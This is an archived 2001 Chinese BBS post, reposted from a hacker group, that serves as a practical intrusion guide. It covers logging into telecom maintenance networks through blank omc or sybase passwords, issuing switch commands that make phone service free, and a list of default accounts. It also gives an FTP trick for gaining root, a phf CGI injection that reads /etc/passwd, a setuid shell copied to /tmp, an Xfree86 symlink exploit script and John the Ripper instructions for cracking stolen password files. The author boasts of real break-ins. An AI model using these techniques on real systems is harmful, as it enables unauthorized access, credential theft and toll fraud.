荔园在线

荔园之美,在春之萌芽,在夏之绽放,在秋之收获,在冬之沉淀

[回到开始] [上一篇][下一篇]


发信人: fast (平淡), 信区: Security
标  题: 入侵电信局
发信站: 荔园晨风BBS站 (Tue Sep 11 13:01:29 2001), 转信

入侵电信局
文章类型:攻击实例 文章加入时间:2001年9月11日11:8
----------------------------------------------------------------------------
----
一.入侵电信局通用入口.
因形势发展需要.大都县,地一级电信局都成立了网路管理,交换维护中心.负责本地
区的话务分析及交换维护.顾名思义.这两个机构都通过各种传输手段和该地区所有被
监控的交换机连通.已ANONYMOUS局来说吧,该局网管中心建了一个FDDI IntraNET. 通
过交换机的人机命令口传来的话务数据进行网络的质量分析.交换传输维护中心也建立
了一个IEEE.802.3的以太网.也和交换机相连.负责交换机的日常维护.这两个中心用
路由器相互联结.再连上环境监控设备.就实现了所谓的机房无人值守.(兄千万不要
爬窗撬门到无人值守的机房去哦.:)而有些局则为了方便技术人员的方便.另外架设
拨号服务器,这样工作人员就可以在任何地方维护到交换机了.(该点眼药水了休息)兄
一定笑了,说了半天,到这儿还不是看我????的H的水平吗?....Bingo! 但你一定要先
摸清ppp的接入电话号码.至于用户名嘛,各地不定,但很多地方是用omc (Operator &
 Maintenance Center)的.而且架这些intranet的人员往往在安全方面不是专家.(不包
括弟哦!):))
在进去以后,先ping自己,知道ip后.(eg. 192.130.5.30)就开始找接交换机的前
台机了.telnet 192.130.5.2(3,4,5,6,7...30) Be patient!
Unix 4.0
login:omc
password:<ENTER>
Succ.....
恭喜!你进去了.如omc加了密码,试试sybase,一般sybase没有密码.进去后.就看
老兄的啦!
二.S1240简介
进入系统以后,别忘了先w一下哦,否则给人kill了,以后加了密码,就没得玩喽!
%cd /u/omc/bin
%mpt
就进维护菜单了.按(1...n)选择对哪个局进行维护.进了交换机的维护端口(mptmon)
后看到的是>提示符.有点象dos? :) yeah.
现在的s1240有两种版本(E & J) family,两种版本命令有些差别.我们先来鉴别一下.

>MM <ENTER>
TRAIN OCT-11-96 WED (TRAIN这儿显示的是局名,各地不一)
<
这是E family.
>MM
TRAIN
<88:dn=k'5757011;
在报告中系统会告诉你这个电话的物理地址EN=h'XXX&YYY;记住!下面有用.
>MM
TRAIN
<378:1="R_OLCOS",2="D_TN"&0&"YYY",3="D_CHRGINF"&0&"40",NA=H'XXX;
从此以后,该电话市话FREE!
注解:那要看你那里是不是拨号上网的,不过好多地方都是走分组交换网,是专线.
另外,那个改市话的方法有几点注意事项:
1. 只适用于老版本交换机;
2. IF 1 IS TRUE
IF 该交换局是长市合一局
THEN 长途也FREE了,哈哈
示例二:我是??????,前段日子,我们曾邀请ISS公司创始人Christopher
Klaus先生(就是您说的那位少年黑客,曾进入美国国防部和NASA,现年22岁)来北京
昆仑饭店和上海新锦江讲座,由于公安部的干预,没有进行市场宣传和安排新闻报道
,只是邀请了国家有关部委和金融界有关人士参加。
至于网络安全漏洞,经对方允许,我曾经对邮电部和清华BBS(未移植到曙光天演之前
)和某银行青岛分行进行扫描,最近一次的结果是邮电部没有高风险漏洞(当然,中
低风险的漏洞还是不少),清华BBS服务器有三个高风险漏洞,而某银行已被我拿到超
级用户口令。ISS的看法是很多网络安全漏洞都是由于配置不当造成的,在动态的网络
环境中管理人员难免不出差错,因此,ISS于97年提出可适应性安全管理模型。
当然,77%的攻击行为是内部人员配合黑客造成的。然而,在内部人员的配合下,在中
国拿到一些口令是相当的容易(前几年我开发数据库系统,问用户口令几乎是有问必
答),这也说明这样一个问题就是我们国家的网络安全意识薄弱。
ISS有一套很好的网络安全产品和解决思路,已经加入了Internet网络安全系统联合领
导委员会,同CRET,NCSA共同研究网络攻击手段。我真诚希望能够同您共同研究这套产
品的网络攻防手段,并且针对黑客攻击的技巧,特点及思路向您请教,希望您帮忙并
多联系。
谢谢您的回信,并祝您新年好!!!
示例三:这个好象有点搞笑,哈哈!
我解开的网页是STUPID.HK.????,具体步骤如下:
我的目标是:PUBLIC.HK.????,可以GET PASSWD,CANT GOT SHADOW,于是我GET了它的
HOSTS文件,试图找出它的关联,发现STUPID.HK.???? STUPID,TELNET TOTHERE.
USER:STUPID
PASSWD:STUPID CANT JION.
USER:ROOT
PASSWD:STUPID GOOD!I GOT IT.THE FOOL ROOT!
CD /ETC
GET PASSWD & GET SHADOW
USE UNSHADOW PASS2DIS BURTE,N:WEBMASTER P:WEBMASTER ...
以上是全过程,希望有参考价值
示例四:
口令的攻击术
黑客攻击目标时常常把破译普通用户的口令作为攻击的开始.先用"finger 远端主机名"
找出主机上的用户帐号,然后就采用字典穷举法进行攻击.它的原理是这样的:网络上的用
户常采用一个英语单词或自己的姓氏作为口令.通过一些程序,自动地从电脑字典中取出
一个单词,作为用户的口令输入给远端的主机,申请进入系统.若口令错误,就按序取出下
一个单词,进行下一个尝试.并一直循环下去,直到找到正确的口令,或字典的单词试完为
止.由于这个破译过程由计算机程序来自动完成,几个小时就可以把字典的所有单词都试
一遍.这类程序的典型是 LetMeIn version 2.0若这种方法不能奏效,黑客就会仔细寻找
目标的薄弱环节和漏洞,伺机夺取目标中存放口令的文件shadow或passwd.因为在现代的
Unix操作系统中,用户的基本信息存放在passwd文件中,而所有的口令则经过DES加密方法
加密后专门存放在一个叫shadow(影子)的文件中,并处于严密的保护之下.老版本的Unix
没有shadow文件,它所有的口令都存放在passwd文件中.一旦夺取口令文
件,黑客们就会用专解DES加密法的程序来解口令.好,首先先让我们把 Unix,
Unix一共是 [0x00~0xff]共128个字符,小于 0x20 的都算是控制符,不能输入为 口令,
0x7f 为转义符, 不能输入.那么总共有128 - 32 - 1 = 95 个字符可作为口令的字符.
也就是 10(数字)+33(标点符号)+26*2(大小写字母)=95个
如果passwd取任意5个字母+1位数字或符号(按顺序)
可能性是52*52*52*52*52*43=16,348,773,000(163亿种可能性)
但如果5个字母是一个常用词,估算一下设常用词5000条,从5000个常用词中取一个词与任
意一个字符组合成口令,即5000*(2*2*2*2*2)(大小写)*43=6,880,000 (688万种可能性)

注:实际情况下绝大多数人都只用小写字符,可能性还要小.但这已经可以用微机进行穷举
了,在Pentium 200上每秒可算3,4万次,象这样简单的口令要不了3分钟. 如果有人用P20
0算上一周,将可进行200亿次攻击,所以6位口令是很不可靠的,至少要用7位.可惜很多用
户确实是这么设passwd的.以上只是粗略估算常见的一种情况, 实际情况还要复杂,主要
是根据用户取口令格式的变化而变化.那些hacker并不需要所有人的口令,他们得到几个
用户口令就能获取系统的控制权,所以取口令过于简单是对系统安全的不负责.
以下举个解密码程序的例子:
John The Ripper 1.4
这个软件由著名的黑客组织--UCF出的,它支持Unix,Dos,Windows,速度超快,
可以说是目前同类中最杰出的作品.对于老式的passwd档(就是没shadow的那种,
任何人能看的都可以把 passwd密文存下来),John可以直接读取并用字典穷举击破.
对于现代的passwd+shadow的方式,John提供了UNSHADOW程序直接把两者合成出
老式passwd文件.
John 的用法简介:
(1)
JOHN -P:PASSWD -W:WORDLIST
WORDLIST是字典文件.
PASSWD是你拿到的密码文件.
(2)
没有字典档时,
在John的配置文件-->john.ini里,有密码长度和字母、数字、符号的设置,设好
后就自动在内存里生成密码去找。这样你用软盘也可以,但机器的速度一定
要快。
(3)
用暴力法破密码时使用参数-i:all
格式为JOHN -I:ALL -P:PASSWD
就可破象5e5t56e6这样的密码了。
这样可以产生A----ZZZZZZZZ的密码,不过时间...嘿嘿....
(4)
当破解到一半因种种原因需要暂时停止破解,按ctrl+c,
下次破解不必从新来过,只要john -restore:restore即可接着破。
john在纯dos下要比在win95下快,用unix更快,
(5)
对于象a2e4u7的密码是很难破出的,但JOHN的INCREMENTAL(渐进)方式的密码组合
引入了一些字母的频率统计信息,即“高频先试”的原则,倒是有些启发
意义。
在JOHN.INI中INCREMENTAL中的B,M,E各行意思如下:
B...Begin M...Middle E...End
如想要加一种方式, 比如字母加数字, 可以设成
[Incremental:a1]
CharCount = 36 (字符的个数,这儿是26个字母+10个数字)
MinLen = 8 (passwd的最小长度)
MaxLen = 8 (passwd的最大长度)
CharsetB = 1203984567smcbtdpajrhflgkwneiovyzuqx
CharsetM = 1203984567eaiornltsuchmdgpkbyvwfzxjq
CharsetE = 1203984567erynsatldoghikmcwpfubzjxvq
加在john.ini里, 执行是incremental参数选a1就行了.
(6)
按Ctrl-C中止运行时,输出是这样:
v: 18 c: 1295458688 t: 1:14:28:08 9% c/s: 11036 w: oentl - obftl
v: 0 c: 5424000 s: 862 c/s: 6292 w: fbymgf
V:是Victory,是破解成功的个数,因为俺运行一段后,破解了2个密码,显示
了V:2,后来又破了几个,V后面的数字也相应变化。
C:Compare,是比较的次数,
T:time,程序已运行了多长时间.
9%: 当前完成度.至100%即全部完成.
c/s:是每秒比较的次数,随机器性能的高低而变化.
W:是当前正在试的一个word,这个word可能位于你的字典中(如果你用字典的话)
或是john产生的。根据W所报告的数字可以估计破解到什么地方了。
(7)
运行需要的字典可以在internet上下载别人已做好的,如:
ftp.cads.com.tw 在 /pub/security下的DICT.ZIP
ftp.uni-koeln.de /pub/dictionaries/
ftp.ox.ac.uk /pub/wordlists
也可以自己做,用txt2dict或pass2dic等专用工具可自动把英语文件转换成字典.
防范的办法
防范的办法很简单,只要使自己的口令不在英语字典中,且不可能被别人猜测出就可以了
. 一个好的口令应当至少有7个字符长,不要用个人信息(如生日,名字等),口令中要有一
些非字母(如数字,标点符号,控制字符等),还要好记一些,不能写在纸上或计算机中的文
件中,选择口令的一个好方法是将两个不相关的词用一个数字或控制字符相连,并截断为
8个字符.例如我以前的口令是me2.hk97
保持口令安全的要点如下:
*不要将口令写下来.
*不要将口令存于电脑文件中.
*不要选取显而易见的信息作口令.
*不要让别人知道.
*不要在不同系统上使用同一口令.
*为防止眼明手快的人窃取口令,在输入口令时应确认无人在身边.
*定期改变口令,至少6个月要改变一次.
最后这点是十分重要的,永远不要对自己的口令过于自信,也许就在无意当中泄露了口令
.定期地改变口令,会使自己遭受黑客攻击的风险降到了一定限度之内.一旦发现自己的口
令不能进入计算机系统,应立即向系统管理员报告,由管理员来检查原因.
系统管理员也应定期运行这些破译口令的工具,来尝试破译shadow文件,若有用户的口令
密码被破译出,说明这些用户的密码取得过于简单或有规律可循,应尽快地通知他们,及时
更正密码,以防止黑客的入侵.
示列五:
一般一个系统第一次安装时会有一些default帐号和密码:
ACCOUNT     PASSWORD
----------- ----------------
root        root
sys         sys/system/bin
bin         sys/bin
mountfsys   mountfsys
adm         adm
uucp        uucp
nuucp       anon
anon        anon
user        user
games       games
install     install
reboot      给 "command login" 用的
demo        demo
umountfsys  umountfsys
sync        sync
admin       admin
guest       guest
daemon      daemon
其中 root, mountfsys, umountfsys, install (有时候sync也是)等都是root level帐
号, 也就是拥有
sysop (系统管理者)的权限, 完全的权限!!! 当你尝试签入某些系统时这些原始帐号及
密码都是很好的
方向, 特别是如果碰到那些少根筋的系统管理者, 嘿嘿! 搞不好你就莫明其妙当了root
 user 了!!!
示列六: FTP入侵法??不太实用的方法 !!
[1] 连接到FTP Server.
[2] 当系统要求你输入User Name 时 [Enter] 不 管 它
[3] Password输 入 --> "quote user ftp"
[4] 接著再输入 --> "quote cwd ~root"
[5] 再输入 --> "quote pass ftp"
这种方法似乎只能用在很老旧的FTP Server上 , 以国内目前的机器应该都不会成功的
, 如果你
想要试试的话 , 找找国外大学的FTP Server 试试看吧!!依照上面的步骤会产生甚么样
的结果??
Hee..he.. 你 就 是 root 啦 !!
示列七: Linux 1.2.13 漏 洞 之 一 ?? 成 为 root 吧 !!
Linux 1.2.13有许多的漏洞 , 如果你所使用的版本是较新的话 , 你大可放心 , 不然你
也可以依
照下面的方法试试你的系统 !!
[1] Telnet 到 yournet.net
[2] Login之后输入 --> "finger @yournet.net"
[3] 再 --> "finger root@yournet.net" 等 root 来 login
[4] 用 WWW Browser 连 到 www.yournet.net
[5] Location 输 入 --> "www.yournet.net/cgi-bin/nph-test-cgi/*"
[6] 回 到 Telnet 软 体 --> "cp /bin/sh /tmp/.sh"
[7] 再 输 入 --> "chmod 4755 /tmp/.sh" (You're root now!!)
至于其它Linux的System Holes, 有机会再慢慢谈罗 !! 当然已经有许多文件讲到了 !!

示列八: 可 以 用 WWW Browser 抓 /etc/passwd ???? 那 当 然 !!
[1] 用 WWW Browser 连 到 yournet.net
[2] Location 输 入 --> "www.yournet.net/cgi-bin/nph-test-cgi?*"
[3] 接著如果出来一份像Report的画面的话 , 接著输入
/cgi-bin/phf?Qalias=x%0aless%20/etc/passwd
[4] 发生了甚么事 ?? etc/passwd 在你的浏览器中" 显示 "出来了!!快点Save吧 !!
这个方法管不管用 ?? 依各系统所使用的 WWW Server 软体不同而有差异 , 所以如果你
在选购
WWW Server 软体的时候也请注意一下它的安全性 , 不一定名牌的就好 , 像这个 Hole
... 当然
这个方法曾经管用过 , 至少两天前还试过它可以破解一两个" 网路咖啡 " 的站台(<--
- 又是 ,
安全性值得讨论)!!
示列九: Xfree86 3.1.2 有 个 漏 洞 能 让 别 人 删 除 " 任 何 " 档 案 ?? 是 的
 ! 包 括 etc/passwd
用这个Script试试看 ...
--- cut here, start code exploit.sh --------------------
!/bin/sh
echo Running exploit to check the Xfree86 3.1.2 hole!
echo Creating file called /tmp/blah which will contain a few words.
echo "This version is NOT exploitable!" >/tmp/blah
ln -s /tmp/blash /tmp/.tX0-lock
startx
echo Now Check /tmp/blah and if it says:
echo \"This version is NOT exploitable!\"
echo then the version you have is not exploitable!
echo Otherwise, it should have a few numbers, then it is exploitable!
--- cut here, end of code exploit.sh -------------------
要怎么补这个漏洞呢 ????
[1] 将它设成superuser 才能执行 ! 用 chmod 4700 指令 .
[2] 作一个group, 只将值得相信的人加入此 group, 使该档案属此group才能执行 .
[3] 更新新版的Xfree86, 可在 http://www.x.org 下载 .
文章出处:第八军团
文章作者:JunTuan

--
※ 来源:·荔园晨风BBS站 bbs.szu.edu.cn·[FROM: 192.168.0.127]


[回到开始] [上一篇][下一篇]

荔园在线首页 友情链接:深圳大学 深大招生 荔园晨风BBS S-Term软件 网络书店